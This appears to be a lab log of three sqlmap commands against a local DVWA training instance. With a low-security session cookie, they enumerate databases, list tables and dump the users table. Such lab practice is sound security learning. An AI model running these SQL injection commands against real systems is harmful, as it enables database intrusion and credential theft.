# SQLMap Commands Used:

1. Enumerate Databases:
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="security=low; PHPSESSID=62872aa381f5f24da77630834bef64d1" --batch --dbs

2. List Tables:
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="security=low; PHPSESSID=62872aa381f5f24da77630834bef64d1" -D dvwa --tables

3. Dump Users Table:
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="security=low; PHPSESSID=62872aa381f5f24da77630834bef64d1" -D dvwa -T users --dump
